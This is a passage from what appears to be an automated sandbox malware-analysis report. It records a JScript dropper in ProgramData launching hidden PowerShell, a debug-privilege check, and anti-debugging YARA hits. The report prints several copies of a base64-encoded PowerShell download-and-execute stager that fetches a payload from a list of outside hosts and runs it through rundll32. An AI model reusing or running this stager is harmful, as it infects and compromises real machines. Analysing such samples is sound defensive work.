ASABJAEEAYQBRAEIAbABBAEgATQBBACIAOwAkAG4AdQB0AHIAaQBsAGkAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAwAEEARwBFAEEAWgB3AEIAcwBBAEcAawBBAFkAUQBCAHkAQQBHAGsAQQBiAGcAQgBwAEEARgBBAEEAYwB3AEIAbABBAEgAVQBBAFoAQQBCAHYAQQBHAGsAQQBjAHcAQgB2AEEASABRAEEAYwBnAEIAdgBBAEgAQQBBAGUAUQBBAHUAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAcQBCAFUAUgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBNAEEAQQB1AEEARABFAEEATgBRAEEANABBAEMANABBAE0AUQBBADQAQQBEAGcAQQBMAGcAQQB4AEEARABjAEEATQBRAEEAPQBxAEIAVQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdABBAEgAawBBAGMAdwBCADAAQQBHAGsAQQBZAHcAQgBoAEEARwB3AEEAYgBBAEIANQBBAEYAUQBBAGMAZwBCAGgAQQBHADQAQQBjAHcAQgBvAEEASABVAEEAYgBRAEIAaABBAEcANABBAFkAdwBCAGwAQQBDADQAQQBkAEEAQgBoAEEASABnAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAZQBsAGUAYwB0AHIAbwBwAHkAcgBvAG0AZQB0AGUAcgAuAHIAaQBzAHMAbwBhAFAAYQBuAG8AcAB0AGkAYwBvAG4AKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAyADMAMAAxADAANQApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBBAEEAYwBnAEIAdgBBAEcAYwBBAGMAZwBCAGgAQQBHADAAQQBSAEEAQgBoAEEASABRAEEAWQBRAEIAYwBBAEcAVQBBAGIAQQBCAGwAQQBHAE0AQQBkAEEAQgB5AEEARwA4AEEAYwBBAEIANQBBAEgASQBBAGIAdwBCAHQAQQBHAFUAQQBkAEEAQgBsAEEASABJAEEATABnAEIAeQBBAEcAawBBAGMAdwBCAHoAQQBHADgAQQBZAFEAQgBRAEEARwBFAEEAYgBnAEIAdgBBAEgAQQBBAGQAQQBCAHAAQQBHAE0AQQBiAHcAQgB1AEEAQwB3AEEAWQBnAEIAcABBAEcANABBAFoAQQBBADcAQQBBAD0APQAiADsAJABTAHUAcABlAHIAYQBjAHQAaQB2AGkAdAB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBFAEEAZABnAEIAcABBAEgASQBBAGQAUQBCAHMAQQBHAFUAQQBiAGcAQgBqAEEARwBVAEEATABnAEIAaQBBAEcAVQBBAGQAQQBBAD0AYwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBrAEEAZABBAEIAcABBAEcARQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgBKAEEARwAwAEEAWQBnAEIAMQBBAEgAUQBBAFoAUQBBAHUAQQBIAE0AQQBZAHcAQgBvAEEARwA4AEEAYgB3AEIAcwBBAEEAPQA9AGMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQB3AEEAdQBBAEQARQBBAE8AQQBBADUAQQBDADQAQQBPAEEAQQA0AEEAQwA0AEEATQBnAEEAeQBBAEQAVQBBAGMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AUQBBADMAQQBDADQAQQBNAGcAQQB3AEEARABFAEEATABnAEEAeABBAEQAawBBAE0AdwBBAD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7AH0AfQA="

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW May 25, 2023, 11:04 a.m.	show_type: 0 filepath_r: wscript parameters: "C:\ProgramData\stalerImmigrator.js" KickoffMaldocchio Aggregates filepath: wscript	1	1	0
ShellExecuteExW May 25, 2023, 11:05 a.m.	show_type: 0 filepath_r: powershell parameters: -encodedcommand "JABXAGgAaQBtAG0AZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQB3AEEAMQBBAEMANABBAE0AZwBBADEAQQBEAFUAQQBMAGcAQQB5AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AUQBBAHcAQQBBAD0APQAiADsAJABoAHkAcABlAHIAbwB2AGEAcgBpAHMAbQBNAGUAdABvAHgAZQBuAG8AdQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATgBnAEEAdQBBAEQASQBBAE0AdwBBAHkAQQBDADQAQQBNAGcAQQAwAEEARABFAEEATABnAEEAeABBAEQAYwBBAE0AUQBBAHYAQQBHAEkAQQBaAGcAQQAwAEEARgBZAEEAWQBRAEEAdgBBAEYAUQBBAE0AZwBBAD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQAUQBBAEwAZwBBAHgAQQBEAGcAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEMANABBAE4AQQBBADMAQQBDADgAQQBVAFEAQgBWAEEAQwA4AEEATQBnAEIAdgBBAEgAVQBBAFUAZwBBAD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAGMAQQBPAFEAQQB1AEEARABjAEEATQB3AEEAdQBBAEQASQBBAE0AZwBBADIAQQBDADgAQQBaAGcAQgBYAEEARwA4AEEAWgBBAEEAdgBBAEcAYwBBAGEAdwBBADEAQQBHAGMAQQB1AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABFAEEATABnAEEAeABBAEQAQQBBAE0AQQBBAHUAQQBEAGMAQQBOAGcAQQB1AEEARABJAEEATQB3AEEAeQBBAEMAOABBAFoAQQBCAFUAQQBHAEUAQQBkAFEAQgBwAEEAQwA4AEEAUgB3AEEAPQB1AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE0AZwBBAHgAQQBDADQAQQBNAGcAQQB6AEEAQwA0AEEATQBRAEEAdwBBAEQAUQBBAEwAdwBCAFUAQQBFAHcAQQBSAHcAQgBvAEEARQA0AEEAWgBBAEEAdgBBAEcAcwBBAFoAdwBCAFcAQQBHAE0AQQBiAEEAQgByAEEAQQA9AD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAEgAQQBIAGMAQQBXAGcAQgA1AEEARABZAEEAdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBHAFUAQQBVAHcAQQB4AEEARQA0AEEATgBBAEIATwBBAEgAbwBBACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEgAYQB6AGEAcgBkAHIAeQBTAHUAYgBhAHIAcgBoAGEAdABpAG8AbgAgAGkAbgAgACQAaAB5AHAAZQByAG8AdgBhAHIAaQBzAG0ATQBlAHQAbwB4AGUAbgBvAHUAcwAgAC0AcwBwAGwAaQB0ACAAIgB1AGEAIgApACAAewB0AHIAeQAgAHsAJAB1AG4AdABoAGkAbgBrAHMAUwB1AG4AZABhAHIAaQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAZwBBAEwAZwBBAHkAQQBEAFEAQQBOAGcAQQB1AEEARABFAEEATQBRAEEANABBAEMANABBAE0AUQBBAHoAQQBEAGsAQQAiADsAJABJAG0AbQBpAG4AdQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBGAEEARwA0AEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAHUAQQBIAE0AQQBkAEEAQgA1AEEARwB3AEEAWgBRAEEAPQBpAEsAVABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAHcAQQB5AEEAQwA0AEEATQBRAEEAeQBBAEQAWQBBAEwAZwBBAHgAQQBEAE0AQQBNAHcAQQB1AEEARABFAEEATQBRAEEAdwBBAEEAPQA9AGkASwBUAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAcABBAEcANABBAGQAQQBCAGwAQQBIAEkAQQBkAGcAQgBsAEEASABJAEEAZABBAEIAbABBAEcASQBBAGMAZwBCAGgAQQBGAE0AQQBiAFEAQgBoAEEARwBNAEEAYQB3AEIAbABBAEgASQBBAGMAdwBBAHUAQQBHAGsAQQBjAGcAQgBwAEEASABNAEEAYQBBAEEAPQAiADsAJABWAGEAcgBpAGEAbgB0AHMAVABvAGcAZwBlAHIAaQBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQASABhAHoAYQByAGQAcgB5AFMAdQBiAGEAcgByAGgAYQB0AGkAbwBuACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAVgBhAHIAaQBhAG4AdABzAFQAbwBnAGcAZQByAGkAZQBzACAALQBPACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGUAbABlAGMAdAByAG8AcAB5AHIAbwBtAGUAdABlAHIALgByAGkAcwBzAG8AYQBQAGEAbgBvAHAAdABpAGMAbwBuADsAJABMAGUAZwBhAGwAaQBzAG0AQwBvAG0AcABlAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AdwBBAHUAQQBEAEUAQQBOAHcAQQAwAEEAQwA0AEEATQBRAEEAMABBAEQAVQBBAEwAZwBBAHgAQQBEAEEAQQBNAGcAQQA9AE8ASABWAG4AYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBRAEEAdwBBAEMANABBAE0AUQBBAHoAQQBEAE0AQQBMAGcAQQB4AEEARABnAEEATQBBAEEAdQBBAEQARQBBAE4AUQBBADAAQQBBAD0APQBPAEgAVgBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAegBBAEcATQBBAGEAUQBCAGgAQQBIAE0AQQBZAHcAQgB2AEEASABBAEEAZQBRAEEAdQBBAEgAUQBBAFoAUQBCAHUAQQBHADQAQQBhAFEAQgB6AEEAQQA9AD0ATwBIAFYAbgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEgAQQBHAHcAQQBhAFEAQgB6AEEASABRAEEAWgBRAEIAdQBBAEcAawBBAGIAZwBCAG4AQQBHAHcAQQBlAFEAQgBVAEEASABVAEEAWQBnAEIAbABBAEgASQBBAGEAUQBCADYAQQBHAEUAQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAdQBBAEcAawBBAGIAZwBCAGsAQQBIAFUAQQBjAHcAQgAwAEEASABJAEEAYQBRAEIAbABBAEgATQBBACIAOwAkAG4AdQB0AHIAaQBsAGkAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAwAEEARwBFAEEAWgB3AEIAcwBBAEcAawBBAFkAUQBCAHkAQQBHAGsAQQBiAGcAQgBwAEEARgBBAEEAYwB3AEIAbABBAEgAVQBBAFoAQQBCAHYAQQBHAGsAQQBjAHcAQgB2AEEASABRAEEAYwBnAEIAdgBBAEgAQQBBAGUAUQBBAHUAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAcQBCAFUAUgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBNAEEAQQB1AEEARABFAEEATgBRAEEANABBAEMANABBAE0AUQBBADQAQQBEAGcAQQBMAGcAQQB4AEEARABjAEEATQBRAEEAPQBxAEIAVQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdABBAEgAawBBAGMAdwBCADAAQQBHAGsAQQBZAHcAQgBoAEEARwB3AEEAYgBBAEIANQBBAEYAUQBBAGMAZwBCAGgAQQBHADQAQQBjAHcAQgBvAEEASABVAEEAYgBRAEIAaABBAEcANABBAFkAdwBCAGwAQQBDADQAQQBkAEEAQgBoAEEASABnAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAZQBsAGUAYwB0AHIAbwBwAHkAcgBvAG0AZQB0AGUAcgAuAHIAaQBzAHMAbwBhAFAAYQBuAG8AcAB0AGkAYwBvAG4AKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAyADMAMAAxADAANQApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBBAEEAYwBnAEIAdgBBAEcAYwBBAGMAZwBCAGgAQQBHADAAQQBSAEEAQgBoAEEASABRAEEAWQBRAEIAYwBBAEcAVQBBAGIAQQBCAGwAQQBHAE0AQQBkAEEAQgB5AEEARwA4AEEAYwBBAEIANQBBAEgASQBBAGIAdwBCAHQAQQBHAFUAQQBkAEEAQgBsAEEASABJAEEATABnAEIAeQBBAEcAawBBAGMAdwBCAHoAQQBHADgAQQBZAFEAQgBRAEEARwBFAEEAYgBnAEIAdgBBAEgAQQBBAGQAQQBCAHAAQQBHAE0AQQBiAHcAQgB1AEEAQwB3AEEAWQBnAEIAcABBAEcANABBAFoAQQBBADcAQQBBAD0APQAiADsAJABTAHUAcABlAHIAYQBjAHQAaQB2AGkAdAB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBFAEEAZABnAEIAcABBAEgASQBBAGQAUQBCAHMAQQBHAFUAQQBiAGcAQgBqAEEARwBVAEEATABnAEIAaQBBAEcAVQBBAGQAQQBBAD0AYwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBrAEEAZABBAEIAcABBAEcARQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgBKAEEARwAwAEEAWQBnAEIAMQBBAEgAUQBBAFoAUQBBAHUAQQBIAE0AQQBZAHcAQgBvAEEARwA4AEEAYgB3AEIAcwBBAEEAPQA9AGMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQB3AEEAdQBBAEQARQBBAE8AQQBBADUAQQBDADQAQQBPAEEAQQA0AEEAQwA0AEEATQBnAEEAeQBBAEQAVQBBAGMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AUQBBADMAQQBDADQAQQBNAGcAQQB3AEEARABFAEEATABnAEEAeABBAEQAawBBAE0AdwBBAD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7AH0AfQA=" filepath: powershell	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 25, 2023, 11:05 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (16 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

One or more non-whitelisted processes were created (4 events)

parent_process	wscript.exe	martian_process	wscript "C:\ProgramData\stalerImmigrator.js" KickoffMaldocchio Aggregates
parent_process	wscript.exe	martian_process	"C:\Windows\System32\wscript.exe" "C:\ProgramData\stalerImmigrator.js" KickoffMaldocchio Aggregates
parent_process	wscript.exe	martian_process	powershell -encodedcommand "JABXAGgAaQBtAG0AZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQB3AEEAMQBBAEMANABBAE0AZwBBADEAQQBEAFUAQQBMAGcAQQB5AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AUQBBAHcAQQBBAD0APQAiADsAJABoAHkAcABlAHIAbwB2AGEAcgBpAHMAbQBNAGUAdABvAHgAZQBuAG8AdQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATgBnAEEAdQBBAEQASQBBAE0AdwBBAHkAQQBDADQAQQBNAGcAQQAwAEEARABFAEEATABnAEEAeABBAEQAYwBBAE0AUQBBAHYAQQBHAEkAQQBaAGcAQQAwAEEARgBZAEEAWQBRAEEAdgBBAEYAUQBBAE0AZwBBAD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQAUQBBAEwAZwBBAHgAQQBEAGcAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEMANABBAE4AQQBBADMAQQBDADgAQQBVAFEAQgBWAEEAQwA4AEEATQBnAEIAdgBBAEgAVQBBAFUAZwBBAD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAGMAQQBPAFEAQQB1AEEARABjAEEATQB3AEEAdQBBAEQASQBBAE0AZwBBADIAQQBDADgAQQBaAGcAQgBYAEEARwA4AEEAWgBBAEEAdgBBAEcAYwBBAGEAdwBBADEAQQBHAGMAQQB1AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABFAEEATABnAEEAeABBAEQAQQBBAE0AQQBBAHUAQQBEAGMAQQBOAGcAQQB1AEEARABJAEEATQB3AEEAeQBBAEMAOABBAFoAQQBCAFUAQQBHAEUAQQBkAFEAQgBwAEEAQwA4AEEAUgB3AEEAPQB1AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE0AZwBBAHgAQQBDADQAQQBNAGcAQQB6AEEAQwA0AEEATQBRAEEAdwBBAEQAUQBBAEwAdwBCAFUAQQBFAHcAQQBSAHcAQgBvAEEARQA0AEEAWgBBAEEAdgBBAEcAcwBBAFoAdwBCAFcAQQBHAE0AQQBiAEEAQgByAEEAQQA9AD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAEgAQQBIAGMAQQBXAGcAQgA1AEEARABZAEEAdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBHAFUAQQBVAHcAQQB4AEEARQA0AEEATgBBAEIATwBBAEgAbwBBACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEgAYQB6AGEAcgBkAHIAeQBTAHUAYgBhAHIAcgBoAGEAdABpAG8AbgAgAGkAbgAgACQAaAB5AHAAZQByAG8AdgBhAHIAaQBzAG0ATQBlAHQAbwB4AGUAbgBvAHUAcwAgAC0AcwBwAGwAaQB0ACAAIgB1AGEAIgApACAAewB0AHIAeQAgAHsAJAB1AG4AdABoAGkAbgBrAHMAUwB1AG4AZABhAHIAaQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAZwBBAEwAZwBBAHkAQQBEAFEAQQBOAGcAQQB1AEEARABFAEEATQBRAEEANABBAEMANABBAE0AUQBBAHoAQQBEAGsAQQAiADsAJABJAG0AbQBpAG4AdQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBGAEEARwA0AEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAHUAQQBIAE0AQQBkAEEAQgA1AEEARwB3AEEAWgBRAEEAPQBpAEsAVABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAHcAQQB5AEEAQwA0AEEATQBRAEEAeQBBAEQAWQBBAEwAZwBBAHgAQQBEAE0AQQBNAHcAQQB1AEEARABFAEEATQBRAEEAdwBBAEEAPQA9AGkASwBUAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAcABBAEcANABBAGQAQQBCAGwAQQBIAEkAQQBkAGcAQgBsAEEASABJAEEAZABBAEIAbABBAEcASQBBAGMAZwBCAGgAQQBGAE0AQQBiAFEAQgBoAEEARwBNAEEAYQB3AEIAbABBAEgASQBBAGMAdwBBAHUAQQBHAGsAQQBjAGcAQgBwAEEASABNAEEAYQBBAEEAPQAiADsAJABWAGEAcgBpAGEAbgB0AHMAVABvAGcAZwBlAHIAaQBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQASABhAHoAYQByAGQAcgB5AFMAdQBiAGEAcgByAGgAYQB0AGkAbwBuACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAVgBhAHIAaQBhAG4AdABzAFQAbwBnAGcAZQByAGkAZQBzACAALQBPACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGUAbABlAGMAdAByAG8AcAB5AHIAbwBtAGUAdABlAHIALgByAGkAcwBzAG8AYQBQAGEAbgBvAHAAdABpAGMAbwBuADsAJABMAGUAZwBhAGwAaQBzAG0AQwBvAG0AcABlAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AdwBBAHUAQQBEAEUAQQBOAHcAQQAwAEEAQwA0AEEATQBRAEEAMABBAEQAVQBBAEwAZwBBAHgAQQBEAEEAQQBNAGcAQQA9AE8ASABWAG4AYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBRAEEAdwBBAEMANABBAE0AUQBBAHoAQQBEAE0AQQBMAGcAQQB4AEEARABnAEEATQBBAEEAdQBBAEQARQBBAE4AUQBBADAAQQBBAD0APQBPAEgAVgBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAegBBAEcATQBBAGEAUQBCAGgAQQBIAE0AQQBZAHcAQgB2AEEASABBAEEAZQBRAEEAdQBBAEgAUQBBAFoAUQBCAHUAQQBHADQAQQBhAFEAQgB6AEEAQQA9AD0ATwBIAFYAbgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEgAQQBHAHcAQQBhAFEAQgB6AEEASABRAEEAWgBRAEIAdQBBAEcAawBBAGIAZwBCAG4AQQBHAHcAQQBlAFEAQgBVAEEASABVAEEAWQBnAEIAbABBAEgASQBBAGEAUQBCADYAQQBHAEUAQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAdQBBAEcAawBBAGIAZwBCAGsAQQBIAFUAQQBjAHcAQgAwAEEASABJAEEAYQBRAEIAbABBAEgATQBBACIAOwAkAG4AdQB0AHIAaQBsAGkAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAwAEEARwBFAEEAWgB3AEIAcwBBAEcAawBBAFkAUQBCAHkAQQBHAGsAQQBiAGcAQgBwAEEARgBBAEEAYwB3AEIAbABBAEgAVQBBAFoAQQBCAHYAQQBHAGsAQQBjAHcAQgB2AEEASABRAEEAYwBnAEIAdgBBAEgAQQBBAGUAUQBBAHUAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAcQBCAFUAUgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBNAEEAQQB1AEEARABFAEEATgBRAEEANABBAEMANABBAE0AUQBBADQAQQBEAGcAQQBMAGcAQQB4AEEARABjAEEATQBRAEEAPQBxAEIAVQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdABBAEgAawBBAGMAdwBCADAAQQBHAGsAQQBZAHcAQgBoAEEARwB3AEEAYgBBAEIANQBBAEYAUQBBAGMAZwBCAGgAQQBHADQAQQBjAHcAQgBvAEEASABVAEEAYgBRAEIAaABBAEcANABBAFkAdwBCAGwAQQBDADQAQQBkAEEAQgBoAEEASABnAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAZQBsAGUAYwB0AHIAbwBwAHkAcgBvAG0AZQB0AGUAcgAuAHIAaQBzAHMAbwBhAFAAYQBuAG8AcAB0AGkAYwBvAG4AKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAyADMAMAAxADAANQApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBBAEEAYwBnAEIAdgBBAEcAYwBBAGMAZwBCAGgAQQBHADAAQQBSAEEAQgBoAEEASABRAEEAWQBRAEIAYwBBAEcAVQBBAGIAQQBCAGwAQQBHAE0AQQBkAEEAQgB5AEEARwA4A